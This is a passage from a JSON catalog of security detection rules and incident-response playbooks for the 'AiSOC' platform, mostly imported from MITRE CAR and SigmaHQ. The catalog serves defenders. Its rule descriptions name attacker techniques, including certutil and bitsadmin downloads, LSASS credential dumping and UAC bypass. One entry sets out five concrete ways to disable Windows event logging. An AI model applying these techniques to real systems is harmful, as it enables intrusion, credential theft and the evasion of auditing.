"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1553" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-001.yaml" } }, { "id": "mitre-car-car-2021-05-002", "type": "detection", "name": "Batch File Write to System32", "description": "While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\\Windows\\System32 directory tree. There will be only occasional false positives due to administrator actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-002.yaml" } }, { "id": "mitre-car-car-2021-05-003", "type": "detection", "name": "BCDEdit Failure Recovery Modification", "description": "This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-003.yaml" } }, { "id": "mitre-car-car-2021-05-004", "type": "detection", "name": "BITS Job Persistence", "description": "The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list out the jobs during investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-004.yaml" } }, { "id": "mitre-car-car-2021-05-005", "type": "detection", "name": "BITSAdmin Download File", "description": "The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from `bitsadmin.exe`, but the artifacts will appear in a parallel process of `svchost.exe` with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It's important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list out the jobs during investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1197", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-005.yaml" } }, { "id": "mitre-car-car-2021-05-006", "type": "detection", "name": "CertUtil Download With URLCache and Split Arguments", "description": "Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world writeable paths.\\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-006.yaml" } }, { "id": "mitre-car-car-2021-05-007", "type": "detection", "name": "CertUtil Download With VerifyCtl and Split Arguments", "description": "Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will either be written to the current working directory or `%APPDATA%\\..\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\`.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-007.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-007", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-007.yaml" } }, { "id": "mitre-car-car-2021-05-008", "type": "detection", "name": "Certutil exe certificate extraction", "description": "This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1606" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-008.yaml" } }, { "id": "mitre-car-car-2021-05-009", "type": "detection", "name": "CertUtil With Decode Argument", "description": "CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-009.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-009", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-009.yaml" } }, { "id": "mitre-car-car-2021-05-010", "type": "detection", "name": "Create local admin accounts using net exe", "description": "This search looks for the creation of local administrator accounts using net.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1136" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-010.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-010", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-010.yaml" } }, { "id": "mitre-car-car-2021-05-011", "type": "detection", "name": "Create Remote Thread into LSASS", "description": "Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-011.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-011", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-011.yaml" } }, { "id": "mitre-car-car-2021-05-012", "type": "detection", "name": "Create Service In Suspicious File Path", "description": "This detection is to identify a creation of \"user mode service\" where the service file path is located in non-common service folder in windows.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1569" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-012.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-012", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-012.yaml" } }, { "id": "mitre-car-car-2021-11-001", "type": "detection", "name": "Registry Edit with Creation of SafeDllSearchMode Key Set to 0", "description": "Detection of creation of registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\SafeDllSearchMode. The key SafeDllSearchMode, if set to 0, will block the Windows mechanism for the search DLL order and adversaries may execute their own malicious dll.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1574", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-11-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-11-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-11-001.yaml" } }, { "id": "mitre-car-car-2021-11-002", "type": "detection", "name": "Registry Edit with Modification of Userinit, Shell or Notify", "description": "Detection of modification of the registry key values of `Notify`, `Userinit`, and `Shell` located in `HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\` and `HKEY_LOCAL_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\`. When a user logs on, the Registry key values of `Notify`, `Userinit` and `Shell` are used to load dedicated Windows component. Attackers may insert malicious payload following the legitimate value to launch a malicious payload.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-11-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-11-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-11-002.yaml" } }, { "id": "mitre-car-car-2021-12-001", "type": "detection", "name": "Scheduled Task Creation or Modification Containing Suspicious Scripts, Extensions or User Writable Paths", "description": "Detection of the creation or modification of Scheduled Tasks with a suspicious script, extension or user writable path. Attackers may create or modify Scheduled Tasks for the persistent execution of malicious code. This detection focuses at the same time on EventIDs 4688 and 1 with process creation (SCHTASKS) and EventID 4698, 4702 for Scheduled Task creation/modification event log.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-12-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-12-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-12-001.yaml" } }, { "id": "mitre-car-car-2021-12-002", "type": "detection", "name": "Modification of Default Startup Folder in the Registry Key 'Common Startup'", "description": "Detection of the modification of the registry key `Common Startup` located in `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\` and `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\`. When a user logs on, any files located in the Startup Folder are launched. Attackers may modify these folders with other files in order to evade detection set on these default folders. This detection focuses on EventIDs 4688 and 1 for process creation and EventID 4657 for the modification of the Registry Keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-12-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-12-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-12-002.yaml" } }, { "id": "mitre-car-car-2022-03-001", "type": "detection", "name": "Disable Windows Event Logging", "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more. This data is used by security tools and analysts to generate detections. There are different ways to perform this attack.\n1. The first one is to create the Registry Key `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt`. This action will not generate Security EventLog 4657 or Sysmon EventLog 13 because the value of the key remains empty. However, if an attacker uses powershell to perform this attack (and not cmd), a Security EventLog 4663 will be generated (but 4663 generates a lot of noise).\n2. The second way is to disable the service EventLog (display name Windows Event Log). After disabed, attacker must reboot the system. The action of disabling or put in manual the service will modify the Registry Key value `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\start`, therefore Security EventLog 4657 or Sysmon EventLog 13 will be generated on the system.\n3. The third way is linked with the second. By default, the EventLog service cannot be stopped. If an attacker tries to stop the service, this one will restart immediately. Why ? Because to stop completely, this service must stop others, one in particular called netprofm (display name Network List Service). This service remains running until it is disabled. So Attacker must either disable EventLog and after to stop it or disable netprofm and after stop EventLog. Only stopping the service (even as admin) will not have an effect on the EventLog service because of the link with netprofm. Security EventLog 1100 will log the stop of the EventLog service (but also generates a lot of noise because it will generate a log everytime the system shutdown).\n4. The fourth way is to use auditpol.exe to modify the audit configuration and disable/modify important parameters that will lead to disable the creation of EventLog.\n5. The last one is to modify the Registry Key value `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security\\file` (or other kind of log) to modify the path where the EventLog are stocked. Importantly, with this technique, the EventViewer will use the value of the Registry Key \"file\" to know where to find the Log. Thus, using the EventViewer will always show the current event logs, but the old one will be stocked in another evtx. Also, the path must be in a folder that the Eventlog process has access (like it doesn\u2019t work if attacker set up the new path in the Desktop). Attacker can also decrease the maxsize value of the Log to force the system to rewrite on the older EventLog (but the minimum cannot be less than 1028 KB). As the Registry key is modified, Security EventLog 4657 or Sysmon EventLog 13 will be generated on the system. All of these attacks required administrative right. Attacks number three, four and five do not require a system reboot to be effective immediately.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2022-03-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2022-03-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2022-03-001.yaml" } }, { "id": "oauth-abuse-response-v1", "type": "detection", "name": "OAuth Application Abuse Response", "description": "Responds to OAuth application abuse including consent phishing, malicious app grants, and unauthorized OAuth token usage. Revokes malicious app access, audits all consented apps, and notifies affected users.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "oauth", "identity", "saas", "consent-phishing", "app-abuse" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/oauth-abuse-response.yaml" }, { "id": "phishing-response-v1", "type": "detection", "name": "Phishing Email Response", "description": "Responds to confirmed or suspected phishing emails. Quarantines the message across the tenant, extracts and blocks malicious URLs and sender domains, identifies other recipients, and triggers user awareness notifications.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "phishing", "email", "identity", "containment" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/phishing-response.yaml" }, { "id": "privilege-escalation-response-v1", "type": "detection", "name": "Privilege Escalation Response", "description": "Responds to detected privilege escalation attempts including sudo abuse, SUID/SGID exploitation, token impersonation, or role assignment anomalies. Revokes elevated privileges, isolates the session, and logs forensic evidence.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "privilege-escalation", "endpoint", "linux", "windows", "iam" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/privilege-escalation-response.yaml" }, { "id": "ransomware-containment-v1", "type": "detection", "name": "Ransomware Containment & Eradication", "description": "Automated containment and eradication playbook for ransomware incidents. Isolates affected hosts, blocks C2 IPs, snapshots disk state for forensics, and notifies the security team with remediation steps.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "ransomware", "malware", "containment", "endpoint", "high-severity" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/ransomware-containment.yaml" }, { "id": "s3-bucket-exposure-response-v1", "type": "detection", "name": "S3 Bucket Exposure Response", "description": "Responds to S3 bucket misconfigurations including public access enablement, ACL changes granting anonymous access, and unexpected data exfiltration from buckets. Remediates public access, audits bucket policy, and notifies cloud security.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "s3", "cloud", "aws", "misconfiguration", "data-exposure" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/s3-bucket-exposure-response.yaml" }, { "id": "sigmahq-sigma-0022869c-49f7-4ff2-ba03-85ac42ddac58", "type": "detection", "name": "System Information Discovery via Registry Queries", "description": "Detects attempts to query system information directly from the Windows Registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-via-registry-queries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0022869c-49f7-4ff2-ba03-85ac42ddac58", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml" } }, { "id": "sigmahq-sigma-002bdb95-0cf1-46a6-9e08-d38c128a6127", "type": "detection", "name": "WScript or CScript Dropper - File", "description": "Detects a file ending in jse, vbe, js, vba, vbs, wsf, wsh written by cscript.exe or wscript.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wscript-or-cscript-dropper-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" } }, { "id": "sigmahq-sigma-00321fee-ca72-4cce-b011-5415af3b9960", "type": "detection", "name": "MSSQL Destructive Query", "description": "Detects the invocation of MS SQL transactions that are destructive towards table or database data, such as \"DROP TABLE\" or \"DROP DATABASE\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-destructive-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00321fee-ca72-4cce-b011-5415af3b9960", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_destructive_query.yml" } }, { "id": "sigmahq-sigma-0055ad1f-be85-4798-83cf-a6da17c993b3", "type": "detection", "name": "Application URI Configuration Changes", "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-uri-configuration-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0055ad1f-be85-4798-83cf-a6da17c993b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml" } }, { "id": "sigmahq-sigma-0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "type": "detection", "name": "UAC Bypass Using Windows Media Player - Process", "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-windows-media-player-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" } }, { "id": "sigmahq-sigma-00b90cc1-17ec-402c-96ad-3a8117d7a582", "type": "detection", "name": "Suspicious Curl File Upload - Linux", "description": "Detects a suspicious curl process start the adds a file to a web request", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-curl-file-upload-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00b90cc1-17ec-402c-96ad-3a8117d7a582", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" } }, { "id": "sigmahq-sigma-00ba9da1-b510-4f6b-b258-8d338836180f", "type": "detection", "name": "Password Protected ZIP File Opened", "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-protected-zip-file-opened.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00ba9da1-b510-4f6b-b258-8d338836180f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" } }, { "id": "sigmahq-sigma-00bb5bd5-1379-4fcf-a965-a5b6f7478064", "type": "detection", "name": "Windows Firewall Settings Have Been Changed", "description": "Detects activity when the settings of the Windows firewall have been changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-firewall-settings-have-been-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" } }, { "id": "sigmahq-sigma-00d0b5ab-1f55-4120-8e83-487c0a7baf19", "type": "detection", "name": "Download From Suspicious TLD - Blacklist", "description": "Detects download of certain file types from hosts in suspicious TLDs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1203", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/download-from-suspicious-tld-blacklist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml" } }, { "id": "sigmahq-sigma-00d49ed5-4491-4271-a8db-650a4ef6f8c1", "type": "detection", "name": "Suspicious Download from Office Domain", "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1608" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-from-office-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 